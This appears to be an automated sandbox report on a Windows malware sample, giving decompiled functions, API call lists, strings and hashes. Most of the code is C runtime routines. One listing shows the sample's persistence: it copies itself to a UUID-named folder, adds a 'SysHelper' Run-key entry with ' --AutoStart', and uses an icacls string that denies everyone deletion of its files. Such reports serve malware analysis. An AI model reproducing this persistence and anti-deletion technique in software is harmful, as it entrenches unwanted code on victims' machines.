                                                                                    							if(_t242 != _t124) {
                                                                                    								_push(0xffffffff);
                                                                                    								_t124 = E00414690(_t221, _t242, _t124, 0);
                                                                                    							}
                                                                                    						}
                                                                                    						if(_v40 < 8) {
                                                                                    							goto L50;
                                                                                    						} else {
                                                                                    							_push(_v60);
                                                                                    							goto L49;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				_t225 = 0;
                                                                                    				goto L6;
                                                                                    			}
































































                                                                                    0x00411e50
                                                                                    0x00000000
                                                                                    0x00411e52
                                                                                    0x00411e52
                                                                                    0x00411e57
                                                                                    0x00411e59
                                                                                    0x00411e5e
                                                                                    0x00411e60
                                                                                    0x00411e65
                                                                                    0x00411e65
                                                                                    0x00411e5e
                                                                                    0x00411e6e
                                                                                    0x00000000
                                                                                    0x00411e74
                                                                                    0x00411e74
                                                                                    0x00000000
                                                                                    0x00411e74
                                                                                    0x00411e6e
                                                                                    0x00411e50
                                                                                    0x00411d8f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                    • _memset.LIBCMT ref: 00411D3B
                                                                                    • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                    • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                    • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                    • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                    • lstrcpyW.KERNEL32 ref: 00411ECE
                                                                                    • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                    • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                    • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                    • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                    • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                    • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                    • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                    • _memset.LIBCMT ref: 00412090
                                                                                    • lstrcpyW.KERNEL32 ref: 004120AA
                                                                                    • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                    • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                    • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                    • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                    • _memset.LIBCMT ref: 00412120
                                                                                    • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                    • lstrcpyW.KERNEL32 ref: 00412158
                                                                                    • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                    • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                    • API String ID: 2589766509-1182136429
                                                                                    • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                    • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                    • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                    • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                                    C-Code - Quality: 82%
                                                                                    			E00423576(signed int __edx, signed int _a4, signed int _a8) {
                                                                                    				char _v8;
                                                                                    				char _v12;
                                                                                    				char _v16;
                                                                                    				signed int _v20;
                                                                                    				char _v24;
                                                                                    				intOrPtr _v52;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				signed int* _t81;
                                                                                    				signed int _t83;
                                                                                    				void* _t84;
                                                                                    				signed int _t87;
                                                                                    				signed int _t89;
                                                                                    				signed int _t92;
                                                                                    				void* _t94;
                                                                                    				signed int _t95;
                                                                                    				signed int _t98;
                                                                                    				signed int _t100;
                                                                                    				signed int _t102;
                                                                                    				signed int _t105;
                                                                                    				void* _t106;
                                                                                    				signed int _t108;
                                                                                    				void* _t109;
                                                                                    				signed int _t111;
                                                                                    				signed int _t117;
                                                                                    				signed int _t126;
                                                                                    				signed int _t132;
                                                                                    				signed int* _t135;
                                                                                    				signed int _t139;
                                                                                    				signed int _t141;
                                                                                    				void* _t143;
                                                                                    				void* _t155;
                                                                                    				signed int _t158;
                                                                                    				signed int _t167;
                                                                                    				signed int* _t171;
                                                                                    				signed int _t173;
                                                                                    				signed int _t177;
                                                                                    				signed int _t178;
                                                                                    				intOrPtr _t180;
                                                                                    				signed int _t182;
                                                                                    				void* _t184;
                                                                                    				void* _t186;
                                                                                    				signed int _t187;
                                                                                    				signed int _t188;
                                                                                    
                                                                                    				_t167 = __edx;
                                                                                    				_t171 = _a4;
                                                                                    				_v12 = 0;
                                                                                    				_v16 = 0;
                                                                                    				_v8 = 0;
                                                                                    				_t195 = _t171;
                                                                                    				if(_t171 != 0) {
                                                                                    					E0042B420(_t171, 0xff, 0x24);
                                                                                    					_t177 = _a8;
                                                                                    					__eflags = _t177;
                                                                                    					if(__eflags == 0) {
                                                                                    						goto L1;
                                                                                    					} else {
                                                                                    						__eflags =  *(_t177 + 4);
                                                                                    						if(__eflags > 0) {
                                                                                    							L9:
                                                                                    							_t84 = 7;
                                                                                    							__eflags =  *(_t177 + 4) - _t84;
                                                                                    							if(__eflags < 0) {
                                                                                    								L12:
                                                                                    								E0042FB64(0, _t167, _t171, _t177, __eflags); // executed
                                                                                    								_t87 = E0042F803( &_v12);
                                                                                    								__eflags = _t87;
                                                                                    								if(_t87 != 0) {
                                                                                    									L45:
                                                                                    									_push(0);
                                                                                    									_push(0);
                                                                                    									_push(0);
                                                                                    									_push(0);
                                                                                    									_push(0);
                                                                                    									E004242FD(0, _t167);
                                                                                    									asm("int3");
                                                                                    									_push(_t177);
                                                                                    									_t180 = _v52;
                                                                                    									_t89 =  *(_t180 + 0xc);
                                                                                    									__eflags = _t89 & 0x00000083;
                                                                                    									if(__eflags != 0) {
                                                                                    										_push(0);
                                                                                    										_t139 = _a8;
                                                                                    										 *(_t180 + 0xc) = _t89 & 0xffffffef;
                                                                                    										_push(_t171);
                                                                                    										__eflags = _t139 - 1;
                                                                                    										if(_t139 != 1) {
                                                                                    											_t173 = _a4;
                                                                                    										} else {
                                                                                    											_t173 = _a4 + E004230C5(_t139, _t167, _t180, _t180);
                                                                                    											_t139 = 0;
                                                                                    										}
                                                                                    										E0042836B(_t167, _t180);
                                                                                    										_t92 =  *(_t180 + 0xc);
                                                                                    										__eflags = _t92;
                                                                                    										if(_t92 >= 0) {
                                                                                    											__eflags = _t92 & 0x00000001;
                                                                                    											if((_t92 & 0x00000001) != 0) {
                                                                                    												__eflags = _t92 & 0x00000008;
                                                                                    												if((_t92 & 0x00000008) != 0) {
                                                                                    													__eflags = _t92 & 0x00000400;
                                                                                    													if((_t92 & 0x00000400) == 0) {
                                                                                    														 *((intOrPtr*)(_t180 + 0x18)) = 0x200;
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    										} else {
                                                                                    											 *(_t180 + 0xc) = _t92 & 0xfffffffc;
                                                                                    										}
                                                                                    										_push(_t139);
                                                                                    										_push(_t173);
                                                                                    										_push(E0042816B(_t180));
                                                                                    										_t94 = E0042818F(_t139, _t167, _t173, _t180, __eflags);
                                                                                    										__eflags = _t94 - 0xffffffff;
                                                                                    										_t78 = _t94 != 0xffffffff;
                                                                                    										__eflags = _t78;
                                                                                    										_t79 = (0 | _t78) - 1; // -1
                                                                                    										_t95 = _t79;
                                                                                    									} else {
                                                                                    										_t98 = E00425208(__eflags);
                                                                                    										 *_t98 = 0x16;
                                                                                    										_t95 = _t98 | 0xffffffff;
                                                                                    									}
                                                                                    									return _t95;
                                                                                    								} else {
                                                                                    									_t100 = E0042F82D( &_v16);
                                                                                    									__eflags = _t100;
                                                                                    									if(_t100 != 0) {
                                                                                    										goto L45;
                                                                                    									} else {
                                                                                    										_t102 = E0042F857( &_v8);
                                                                                    										__eflags = _t102;
                                                                                    										if(_t102 != 0) {
                                                                                    											goto L45;
                                                                                    										} else {
                                                                                    											_t11 = _t177 + 4; // 0x858d0050
                                                                                    											_t141 =  *_t11;
                                                                                    											_t155 =  *_t177;
                                                                                    											__eflags = _t141;
                                                                                    											if(__eflags < 0) {
                                                                                    												L23:
                                                                                    												_t83 = E0042F939(_t171, _t177);
                                                                                    												__eflags = _t83;
                                                                                    												if(_t83 == 0) {
                                                                                    													__eflags = _v12 - _t83;
                                                                                    													if(__eflags == 0) {
                                                                                    														L27:
                                                                                    														asm("cdq");
                                                                                    														_t182 = _t167;
                                                                                    														asm("cdq");
                                                                                    														_t143 =  *_t171 - _v8;
                                                                                    														asm("sbb esi, edx");
                                                                                    													} else {
                                                                                    														_push(_t171);
                                                                                    														_t126 = E0042FBB4(_t141, _t171, _t177, __eflags);
                                                                                    														__eflags = _t126;
                                                                                    														if(_t126 == 0) {
                                                                                    															goto L27;
                                                                                    														} else {
                                                                                    															asm("cdq");
                                                                                    															_t171[8] = 1;
                                                                                    															asm("cdq");
                                                                                    															_t143 =  *_t171 - _v16 + _v8;
                                                                                    															asm("sbb edx, esi");
                                                                                    															_a4 = _t167;
                                                                                    															_t182 = _t167;
                                                                                    														}
                                                                                    													}
                                                                                    													_t105 = E004305A0(_t143, _t182, 0x3c, 0);
                                                                                    													 *_t171 = _t105;
                                                                                    													__eflags = _t105;
                                                                                    													if(_t105 < 0) {
                                                                                    														_t143 = _t143 + 0xffffffc4;
                                                                                    														 *_t171 = _t105 + 0x3c;
                                                                                    														asm("adc esi, 0xffffffff");
                                                                                    													}
                                                                                    													_t106 = E004304F0(_t143, _t182, 0x3c, 0);
                                                                                    													_t144 = _t167;
                                                                                    													asm("cdq");
                                                                                    													_t184 = _t106 + _t171[1];
                                                                                    													asm("adc ebx, edx");
                                                                                    													_t108 = E004305A0(_t184, _t167, 0x3c, 0);
                                                                                    													_t171[1] = _t108;
                                                                                    													__eflags = _t108;
                                                                                    													if(_t108 < 0) {
                                                                                    														_t184 = _t184 + 0xffffffc4;
                                                                                    														_t171[1] = _t108 + 0x3c;
                                                                                    														asm("adc ebx, 0xffffffff");
                                                                                    													}
                                                                                    													_t109 = E004304F0(_t184, _t144, 0x3c, 0);
                                                                                    													_t145 = _t167;
                                                                                    													asm("cdq");
                                                                                    													_t186 = _t109 + _t171[2];
                                                                                    													asm("adc ebx, edx");
                                                                                    													_t111 = E004305A0(_t186, _t167, 0x18, 0);
                                                                                    													_t171[2] = _t111;
                                                                                    													__eflags = _t111;
                                                                                    													if(_t111 < 0) {
                                                                                    														_t186 = _t186 + 0xffffffe8;
                                                                                    														_t171[2] = _t111 + 0x18;
                                                                                    														asm("adc ebx, 0xffffffff");
                                                                                    													}
                                                                                    													_t158 = E004304F0(_t186, _t145, 0x18, 0);
                                                                                    													__eflags = _t167;
                                                                                    													if(__eflags < 0) {
                                                                                    														L43:
                                                                                    														_t171[3] = _t171[3] + _t158;
                                                                                    														asm("cdq");
                                                                                    														_t187 = 7;
                                                                                    														_t117 = _t171[3];
                                                                                    														_t171[6] = (_t171[6] + 7 + _t158) % _t187;
                                                                                    														__eflags = _t117;
                                                                                    														if(_t117 > 0) {
                                                                                    															goto L38;
                                                                                    														} else {
                                                                                    															_t171[4] = 0xb;
                                                                                    															_t171[3] = _t117 + 0x1f;
                                                                                    															_t55 = _t158 + 0x16d; // 0x16d
                                                                                    															_t171[7] = _t171[7] + _t55;
                                                                                    															_t171[5] = _t171[5] - 1;
                                                                                    														}
                                                                                    													} else {
                                                                                    														if(__eflags > 0) {
                                                                                    															L37:
                                                                                    															asm("cdq");
                                                                                    															_t188 = 7;
                                                                                    															_t39 =  &(_t171[3]);
                                                                                    															 *_t39 = _t171[3] + _t158;
                                                                                    															__eflags =  *_t39;
                                                                                    															_t171[6] = (_t171[6] + _t158) % _t188;
                                                                                    															L38:
                                                                                    															_t42 =  &(_t171[7]);
                                                                                    															 *_t42 = _t171[7] + _t158;
                                                                                    															__eflags =  *_t42;
                                                                                    														} else {
                                                                                    															__eflags = _t158;
                                                                                    															if(_t158 == 0) {
                                                                                    																__eflags = _t167;
                                                                                    																if(__eflags <= 0) {
                                                                                    																	if(__eflags < 0) {
                                                                                    																		goto L43;
                                                                                    																	} else {
                                                                                    																		__eflags = _t158;
                                                                                    																		if(_t158 < 0) {
                                                                                    																			goto L43;
                                                                                    																		}
                                                                                    																	}
                                                                                    																}
                                                                                    															} else {
                                                                                    																goto L37;
                                                                                    															}
                                                                                    														}
                                                                                    													}
                                                                                    													goto L39;
                                                                                    												}
                                                                                    											} else {
                                                                                    												if(__eflags > 0) {
                                                                                    													L18:
                                                                                    													asm("cdq");
                                                                                    													asm("sbb ebx, edx");
                                                                                    													_v24 = _t155 - _v8;
                                                                                    													_v20 = _t141;
                                                                                    													_t83 = E0042F939(_t171,  &_v24);
                                                                                    													__eflags = _t83;
                                                                                    													if(_t83 == 0) {
                                                                                    														__eflags = _v12 - _t83;
                                                                                    														if(__eflags == 0) {
                                                                                    															L39:
                                                                                    															_t83 = 0;
                                                                                    														} else {
                                                                                    															_push(_t171);
                                                                                    															_t132 = E0042FBB4(_t141, _t171, _t177, __eflags);
                                                                                    															__eflags = _t132;
                                                                                    															if(_t132 == 0) {
                                                                                    																goto L39;
                                                                                    															} else {
                                                                                    																asm("cdq");
                                                                                    																_v24 = _v24 - _v16;
                                                                                    																asm("sbb [ebp-0x10], edx");
                                                                                    																_t83 = E0042F939(_t171,  &_v24);
                                                                                    																__eflags = _t83;
                                                                                    																if(_t83 == 0) {
                                                                                    																	_t171[8] = 1;
                                                                                    																	goto L39;
                                                                                    																}
                                                                                    															}
                                                                                    														}
                                                                                    													}
                                                                                    												} else {
                                                                                    													__eflags = _t155 - 0x3f480;
                                                                                    													if(_t155 <= 0x3f480) {
                                                                                    														goto L23;
                                                                                    													} else {
                                                                                    														goto L18;
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    											goto L3;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							} else {
                                                                                    								if(__eflags > 0) {
                                                                                    									goto L8;
                                                                                    								} else {
                                                                                    									__eflags =  *_t177 - 0x93406fff;
                                                                                    									if(__eflags > 0) {
                                                                                    										goto L8;
                                                                                    									} else {
                                                                                    										goto L12;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						} else {
                                                                                    							if(__eflags < 0) {
                                                                                    								L8:
                                                                                    								_t135 = E00425208(__eflags);
                                                                                    								_t178 = 0x16;
                                                                                    								 *_t135 = _t178;
                                                                                    								goto L2;
                                                                                    							} else {
                                                                                    								__eflags =  *_t177;
                                                                                    								if(__eflags >= 0) {
                                                                                    									goto L9;
                                                                                    								} else {
                                                                                    									goto L8;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					L1:
                                                                                    					_t81 = E00425208(_t195);
                                                                                    					_t178 = 0x16;
                                                                                    					 *_t81 = _t178;
                                                                                    					E004242D2();
                                                                                    					L2:
                                                                                    					_t83 = _t178;
                                                                                    					L3:
                                                                                    					return _t83;
                                                                                    				}
                                                                                    			}
                                                                                    0x0042375b
                                                                                    0x00423760
                                                                                    0x00423763
                                                                                    0x00423765
                                                                                    0x0042376a
                                                                                    0x0042376d
                                                                                    0x00423770
                                                                                    0x00423770
                                                                                    0x0042377e
                                                                                    0x00423780
                                                                                    0x00423782
                                                                                    0x004237af
                                                                                    0x004237b5
                                                                                    0x004237bc
                                                                                    0x004237bd
                                                                                    0x004237c0
                                                                                    0x004237c3
                                                                                    0x004237c6
                                                                                    0x004237c8
                                                                                    0x00000000
                                                                                    0x004237ca
                                                                                    0x004237cd
                                                                                    0x004237d4
                                                                                    0x004237d7
                                                                                    0x004237dd
                                                                                    0x004237e0
                                                                                    0x004237e0
                                                                                    0x00423784
                                                                                    0x00423784
                                                                                    0x0042378a
                                                                                    0x00423791
                                                                                    0x00423792
                                                                                    0x00423795
                                                                                    0x00423795
                                                                                    0x00423795
                                                                                    0x00423798
                                                                                    0x0042379b
                                                                                    0x0042379b
                                                                                    0x0042379b
                                                                                    0x0042379b
                                                                                    0x00423786
                                                                                    0x00423786
                                                                                    0x00423788
                                                                                    0x004237a5
                                                                                    0x004237a7
                                                                                    0x004237a9
                                                                                    0x00000000
                                                                                    0x004237ab
                                                                                    0x004237ab
                                                                                    0x004237ad
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004237ad
                                                                                    0x004237a9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00423788
                                                                                    0x00423784
                                                                                    0x00000000
                                                                                    0x00423782
                                                                                    0x0042362d
                                                                                    0x0042362d
                                                                                    0x00423637
                                                                                    0x0042363a
                                                                                    0x00423641
                                                                                    0x00423643
                                                                                    0x00423647
                                                                                    0x0042364a
                                                                                    0x00423651
                                                                                    0x00423653
                                                                                    0x00423659
                                                                                    0x0042365c
                                                                                    0x0042379e
                                                                                    0x0042379e
                                                                                    0x00423662
                                                                                    0x00423662
                                                                                    0x00423663
                                                                                    0x00423669
                                                                                    0x0042366b
                                                                                    0x00000000
                                                                                    0x00423671
                                                                                    0x00423674
                                                                                    0x00423675
                                                                                    0x0042367c
                                                                                    0x00423680
                                                                                    0x00423687
                                                                                    0x00423689
                                                                                    0x0042368f
                                                                                    0x00000000
                                                                                    0x0042368f
                                                                                    0x00423689
                                                                                    0x0042366b
                                                                                    0x0042365c
                                                                                    0x0042362f
                                                                                    0x0042362f
                                                                                    0x00423635
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00423635
                                                                                    0x0042362d
                                                                                    0x00000000
                                                                                    0x0042362b
                                                                                    0x0042361e
                                                                                    0x0042360c
                                                                                    0x004235df
                                                                                    0x004235df
                                                                                    0x00000000
                                                                                    0x004235e1
                                                                                    0x004235e1
                                                                                    0x004235e7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004235e7
                                                                                    0x004235df
                                                                                    0x004235c5
                                                                                    0x004235c5
                                                                                    0x004235cb
                                                                                    0x004235cb
                                                                                    0x004235d2
                                                                                    0x004235d3
                                                                                    0x00000000
                                                                                    0x004235c7
                                                                                    0x004235c7
                                                                                    0x004235c9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004235c9
                                                                                    0x004235c5
                                                                                    0x004235c3
                                                                                    0x00423591
                                                                                    0x00423591
                                                                                    0x00423591
                                                                                    0x00423598
                                                                                    0x00423599
                                                                                    0x0042359b
                                                                                    0x004235a0
                                                                                    0x004235a0
                                                                                    0x004235a2
                                                                                    0x004235a8
                                                                                    0x004235a8

                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 004235B1
                                                                                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                    • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                    • __gmtime64_s.LIBCMT ref: 00423680
                                                                                    • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                    • __allrem.LIBCMT ref: 004236F3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                    • __allrem.LIBCMT ref: 00423726
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                    • __allrem.LIBCMT ref: 0042375B
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                    • __invoke_watson.LIBCMT ref: 004237EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                    • String ID:
                                                                                    • API String ID: 384356119-0
                                                                                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                    • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                    • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1060 427b0b-427b1a call 427ad7 ExitProcess
                                                                                    C-Code - Quality: 100%
                                                                                    			E00427B0B(int _a4) {
                                                                                    				void* _t4;
                                                                                    
                                                                                    				_t1 =  &_a4; // 0x423b69
                                                                                    				E00427AD7(_t4,  *_t1);
                                                                                    				ExitProcess(_a4);
                                                                                    			}




                                                                                    0x00427b0e
                                                                                    0x00427b11
                                                                                    0x00427b1a

                                                                                    APIs
                                                                                    • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                      • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                      • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                    • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                    • String ID: i;B
                                                                                    • API String ID: 2427264223-472376889
                                                                                    • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                    • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                    • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                    • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1063 42fb64-42fb77 call 428520 1066 42fba5-42fbaa call 428565 1063->1066 1067 42fb79-42fb8c call 428af7 1063->1067 1072 42fb99-42fba0 call 42fbab 1067->1072 1073 42fb8e call 42fe47 1067->1073 1072->1066 1076 42fb93 1073->1076 1076->1072
                                                                                    C-Code - Quality: 80%
                                                                                    			E0042FB64(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				void* _t4;
                                                                                    				void* _t13;
                                                                                    
                                                                                    				_push(8);
                                                                                    				_push(0x507df0);
                                                                                    				_t4 = E00428520(__ebx, __edi, __esi);
                                                                                    				if( *0x51106c == 0) {
                                                                                    					E00428AF7(6);
                                                                                    					 *(_t13 - 4) =  *(_t13 - 4) & 0x00000000;
                                                                                    					_t16 =  *0x51106c;
                                                                                    					if( *0x51106c == 0) {
                                                                                    						E0042FE47(__ebx, __edx, __edi, __esi, _t16); // executed
                                                                                    						 *0x51106c =  *0x51106c + 1;
                                                                                    					}
                                                                                    					 *(_t13 - 4) = 0xfffffffe;
                                                                                    					_t4 = E0042FBAB();
                                                                                    				}
                                                                                    				return E00428565(_t4);
                                                                                    			}






                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 0042FB7B
                                                                                      • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                      • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                    • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                      • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                      • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                      • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                      • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                      • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                      • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                    • String ID:
                                                                                    • API String ID: 360932542-0
                                                                                    • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                    • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                    • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                    • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1077 427f3d-427f47 call 427e0e 1079 427f4c-427f50 1077->1079
                                                                                    C-Code - Quality: 25%
                                                                                    			E00427F3D(intOrPtr _a4) {
                                                                                    				void* __ebp;
                                                                                    				void* _t2;
                                                                                    				void* _t3;
                                                                                    				void* _t4;
                                                                                    				void* _t5;
                                                                                    				void* _t8;
                                                                                    
                                                                                    				_push(0);
                                                                                    				_push(0);
                                                                                    				_push(_a4);
                                                                                    				_t2 = E00427E0E(_t3, _t4, _t5, _t8); // executed
                                                                                    				return _t2;
                                                                                    			}










                                                                                    APIs
                                                                                    • _doexit.LIBCMT ref: 00427F47
                                                                                      • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
